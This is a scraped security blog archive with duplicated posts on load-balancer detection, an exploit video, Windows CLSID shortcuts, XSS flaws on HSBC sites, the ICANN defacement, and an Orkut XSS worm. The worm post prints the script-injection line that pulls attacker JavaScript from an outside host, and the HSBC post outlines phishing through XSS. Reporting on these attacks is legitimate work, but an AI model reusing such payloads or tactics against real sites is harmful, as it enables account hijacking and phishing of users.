there is a good tool that comes in handy, it's halberd
installation
------------
# tar -xzvf halberd-0.2.3.ta.gz
# python setup.py install
running:
--------
# halberd www.site.com
or
# halberd
Friday, June 26, 2009
Detecting Load Balancers
While penetration testing we might require to find the load balancers on the site, it's pretty complicated to find the no of load balancers,
there is a good tool that comes in handy, it's halberd
installation
------------
# tar -xzvf halberd-0.2.3.ta.gz
# python setup.py install
running:
--------
# halberd www.site.com
or
# halberd
there is a good tool that comes in handy, it's halberd
installation
------------
# tar -xzvf halberd-0.2.3.ta.gz
# python setup.py install
running:
--------
# halberd www.site.com
or
# halberd
Saturday, January 24, 2009
[tut] Exploiting writing tutorial
here is a video of making a small exploit
hope u will enjoy this…
http://rapidshare.com/files/186194137/exploit.part1.rar
http://rapidshare.com/files/186210843/exploit.part2.rar
http://rapidshare.com/files/186196866/exploit.part3.rar
[ low res ]
http://rapidshare.com/files/186713908/Destiny_media_player_BOF.wmv
hope u will enjoy this…
http://rapidshare.com/files/186194137/exploit.part1.rar
http://rapidshare.com/files/186210843/exploit.part2.rar
http://rapidshare.com/files/186196866/exploit.part3.rar
[ low res ]
http://rapidshare.com/files/186713908/Destiny_media_player_BOF.wmv
Saturday, December 13, 2008
Fun with CLSID
My Computer
[Paste it run box]
Explorer /E,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Explanation: The object My Computer is a namespace which has the CLSID: {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Control Panel
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}
Explanation: The Control Panel object whose CLSID is: {21EC2020-3AEA-1069-A2DD-08002B30309D} is a sub-object of My Computer.
Printers and telecopiers
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}
Fonts
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D20EA4E1-3957-11d2-A40B-0C5020524152}
Scanners and Cameras
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{E211B736-43FD-11D1-9EFB-0000F8757FCD}
Network Neighbourhood
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
Administration Tools
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D20EA4E1-3957-11d2-A40B-0C5020524153}
Tasks Scheduler
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Web Folders
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11D0-BCED-00A0C90AB50F}
My Documents
Explorer /N,::{450D8FBA-AD25-11D0-98A8-0800361B1103}
Recycle Bin
Explorer /N,::{645FF040-5081-101B-9F08-00AA002F954E}
Network Favorites
Explorer /N,::{208D2C60-3AEA-1069-A2D7-08002B30309D}
Default Navigator
Explorer /N,::{871C5380-42A0-1069-A2EA-08002B30309D}
Computer search results folder
Explorer /N,::{1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}
Network Search Results computer
Explorer /N,::{E17D4FC0-5564-11D1-83F2-00A0C90DC849}
[Paste it run box]
Explorer /E,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Explanation: The object My Computer is a namespace which has the CLSID: {20D04FE0-3AEA-1069-A2D8-08002B30309D}
Control Panel
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}
Explanation: The Control Panel object whose CLSID is: {21EC2020-3AEA-1069-A2DD-08002B30309D} is a sub-object of My Computer.
Printers and telecopiers
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}
Fonts
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D20EA4E1-3957-11d2-A40B-0C5020524152}
Scanners and Cameras
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{E211B736-43FD-11D1-9EFB-0000F8757FCD}
Network Neighbourhood
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
Administration Tools
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D20EA4E1-3957-11d2-A40B-0C5020524153}
Tasks Scheduler
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
Web Folders
Explorer /N,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11D0-BCED-00A0C90AB50F}
My Documents
Explorer /N,::{450D8FBA-AD25-11D0-98A8-0800361B1103}
Recycle Bin
Explorer /N,::{645FF040-5081-101B-9F08-00AA002F954E}
Network Favorites
Explorer /N,::{208D2C60-3AEA-1069-A2D7-08002B30309D}
Default Navigator
Explorer /N,::{871C5380-42A0-1069-A2EA-08002B30309D}
Computer search results folder
Explorer /N,::{1F4DE370-D627-11D1-BA4F-00A0C91EEDBA}
Network Search Results computer
Explorer /N,::{E17D4FC0-5564-11D1-83F2-00A0C90DC849}
Wednesday, November 5, 2008
HSBC web sites are open to critical XSS attacks. Warning to customers!
Evidently, major unwanted consequences could be a result of multiple cross-site scripting vulnerabilities affecting bank web sites. XSS must be considered as the phishers' future weapon by all people working in the security industry.
Scammers can register domains and set up fake bank web sites in a few minutes. With the help of bulk e-mailers they can phish personal sensitive data from thousands of unsuspecting web users.
If they want to own HSBC's e-banking customers, all they have to do is to register a "suspicious" looking domain like hscsbc.com which is currently available and then serve a phishing page.
Even better, they can exploit a cross-site scripting vuln on hsbc.com, obfuscate the attack vector and significantly increase their phishing success rate!
Updated: 23/06/08:
www.investdirect.hsbc.gr XSS notified by Hexspirit
www.investdirect.hsbc.gr XSS notified by Hexspirit
www.hsbc.com.sv XSS notified by sl4xUz
www.hsbc.com XSS notified by Airrox
-
www.hsbc.co.uk XSS notified by PaPPy / unfixed
www.hsbc.com.tr XSS notified by DaiMon / unfixed since 26/05/2008
www.hbeu1.hsbc.com XSS notified by DaiMon / unfixed since 26/05/2008
www.hsbc.com.tr XSS notified by Babaconda / unfixed since 25/05/2008
www.hsbcprivatebankfrance.com XSS notified by ironzorg / unfixed since 25/04/2008
www.hsbc.fi.cr XSS notified by Venom23 / unfixed since 26/02/2008
www.hsbc.com XSS notified by Darkster / published on 26/07/2007 - fixed on 12/09/2007
monavenir.hsbc.fr XSS notified by takethis /published on 01/04/2007 - fixed on 21/08/2007
Protect your customers' privacy and security now! Leaving site-specific vulnerabilities open for days, weeks or months, can lead to substantial financial losses! :-/
We suggest that you subscribe your online properties to the XSS early warning mailing list.
Related News (Updated):
"HSBC scripting flaws play into the hands of phishers", John Leyden, The Register, 25 Jun 08
"HSBC sites vulnerable to XSS flaws, could aid phishing attacks", Dancho Danchev, 29 Jun 08
Scammers can register domains and set up fake bank web sites in a few minutes. With the help of bulk e-mailers they can phish personal sensitive data from thousands of unsuspecting web users.
If they want to own HSBC's e-banking customers, all they have to do is to register a "suspicious" looking domain like hscsbc.com which is currently available and then serve a phishing page.
Even better, they can exploit a cross-site scripting vuln on hsbc.com, obfuscate the attack vector and significantly increase their phishing success rate!
Updated: 23/06/08:
www.investdirect.hsbc.gr XSS notified by Hexspirit
www.investdirect.hsbc.gr XSS notified by Hexspirit
www.hsbc.com.sv XSS notified by sl4xUz
www.hsbc.com XSS notified by Airrox
-
www.hsbc.co.uk XSS notified by PaPPy / unfixed
www.hsbc.com.tr XSS notified by DaiMon / unfixed since 26/05/2008
www.hbeu1.hsbc.com XSS notified by DaiMon / unfixed since 26/05/2008
www.hsbc.com.tr XSS notified by Babaconda / unfixed since 25/05/2008
www.hsbcprivatebankfrance.com XSS notified by ironzorg / unfixed since 25/04/2008
www.hsbc.fi.cr XSS notified by Venom23 / unfixed since 26/02/2008
www.hsbc.com XSS notified by Darkster / published on 26/07/2007 - fixed on 12/09/2007
monavenir.hsbc.fr XSS notified by takethis /published on 01/04/2007 - fixed on 21/08/2007
Protect your customers' privacy and security now! Leaving site-specific vulnerabilities open for days, weeks or months, can lead to substantial financial losses! :-/
We suggest that you subscribe your online properties to the XSS early warning mailing list.
Related News (Updated):
"HSBC scripting flaws play into the hands of phishers", John Leyden, The Register, 25 Jun 08
"HSBC sites vulnerable to XSS flaws, could aid phishing attacks", Dancho Danchev, 29 Jun 08
ICANN and IANA domains hijacked by Turkish crackers
The ICANN and IANA websites were defaced earlier today by a Turkish group called "NetDevilz". ICANN is responsible for the global coordination of the Internet's system of unique identifiers. These include domain names, as well as the addresses used in a variety of Internet protocols.
The Internet Assigned Numbers Authority (IANA) is responsible for the global coordination of the DNS Root, IP addressing, and other Internet protocol resources.
Their domains were redirecting to a hosting space at "atspace.com" where the defacers left the following message:
"You think that you control the domains but you don't! Everybody knows wrong. We control the domains including ICANN! Don't you believe us?"
Hijacked domains include "icann.com", "icann.net", "iana.com" and "iana-servers.com".
We reached the defacers by email but they refused to tell us how they changed the DNS records, however a cross-site scripting or cross-site request forgery vulnerability might have been exploited.
Here is the mirror of the ICANN.com defacement:
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,0/id,7635102/
You can have a look at their other defacements here:
http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,NetDevilz/
Original News:
http://www.zone-h.org/content/view/14973/1/
The Internet Assigned Numbers Authority (IANA) is responsible for the global coordination of the DNS Root, IP addressing, and other Internet protocol resources.
Their domains were redirecting to a hosting space at "atspace.com" where the defacers left the following message:
"You think that you control the domains but you don't! Everybody knows wrong. We control the domains including ICANN! Don't you believe us?"
Hijacked domains include "icann.com", "icann.net", "iana.com" and "iana-servers.com".
We reached the defacers by email but they refused to tell us how they changed the DNS records, however a cross-site scripting or cross-site request forgery vulnerability might have been exploited.
Here is the mirror of the ICANN.com defacement:
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,0/id,7635102/
You can have a look at their other defacements here:
http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,NetDevilz/
Original News:
http://www.zone-h.org/content/view/14973/1/
New Orkut XSS worm by Brazilian web security group
Security researchers Octane[F/X], Rodrigo Lacerda and Klay Gomes were able to hack again Orkut with their new XSS worm.
http://www.xssed.com/files/Image/xssworms/orkutxss.zip
The photo commentary parameter was not properly filtered, thus allowed insertion of this malicious script:
---------------------
a=document.createElement('SCRIPT');a.src='http://octanefx.com/bugOrkut.js';document.getElementsByTagName('head').item(O).appendChild(A);
----------------------
This worm joined victims to some communities, left Orkut scraps to community members, added victims to friends lists, changed their profile picture and infected all of their personal photos. Therefore, anyone who visited an infected photo album, got infected.
Firefox users were vulnerable to attack. Opera and some versions of IE were not affected.
Good news is that it doesn't work anymore, Google once again fixed it in record time.
For educational purposes we uploaded a zip file containing all the worm's associated JavaScript codes.
http://www.xssed.com/files/Image/xssworms/orkutxss.zip
The photo commentary parameter was not properly filtered, thus allowed insertion of this malicious script:
---------------------
a=document.createElement('SCRIPT');a.src='http://octanefx.com/bugOrkut.js';document.getElementsByTagName('head').item(O).appendChild(A);
----------------------
This worm joined victims to some communities, left Orkut scraps to community members, added victims to friends lists, changed their profile picture and infected all of their personal photos. Therefore, anyone who visited an infected photo album, got infected.
Firefox users were vulnerable to attack. Opera and some versions of IE were not affected.
Good news is that it doesn't work anymore, Google once again fixed it in record time.
For educational purposes we uploaded a zip file containing all the worm's associated JavaScript codes.
Memoryze This
At the Hack in the Box security conference in Malaysia Wednesday, Mandiant’s Peter Silberman announced the release of Mandiant’s newest free tool for incident response and forensic investigations. The tool, Memoryze, is the latest memory analysis tool for first responders to consider adding to their toolkit for acquiring physical memory from running Windows systems. This summer, we saw the release of several other tools to do the same thing, but they stopped short at providing the ability to acquire a forensic image (or copy) of physical memory. Memoryze goes further and provides advanced analysis capabilities of both physical memory from live, running Windows systems and memory images previously acquired from running systems.
I spent a couple hours working with Memoryze in the wee hours of this morning and found it to be quite powerful. It acquires memory quickly and writes it in a raw format that can be read by the other memory analysis tools like the Volatility Framework. I tested Memoryze's ability to read physical memory images acquired by itself, Mantech’s mdd, Guidance Software's winen and win32dd. Note: For winen, I had to convert Encase format to a raw dd format using FTK Imager first. I didn't have any problems analyzing all four images acquired by the various tools. Additionally, I tested Volatility with similar success.
I spent a couple hours working with Memoryze in the wee hours of this morning and found it to be quite powerful. It acquires memory quickly and writes it in a raw format that can be read by the other memory analysis tools like the Volatility Framework. I tested Memoryze's ability to read physical memory images acquired by itself, Mantech’s mdd, Guidance Software's winen and win32dd. Note: For winen, I had to convert Encase format to a raw dd format using FTK Imager first. I didn't have any problems analyzing all four images acquired by the various tools. Additionally, I tested Volatility with similar success.
Subscribe to:
Posts (Atom)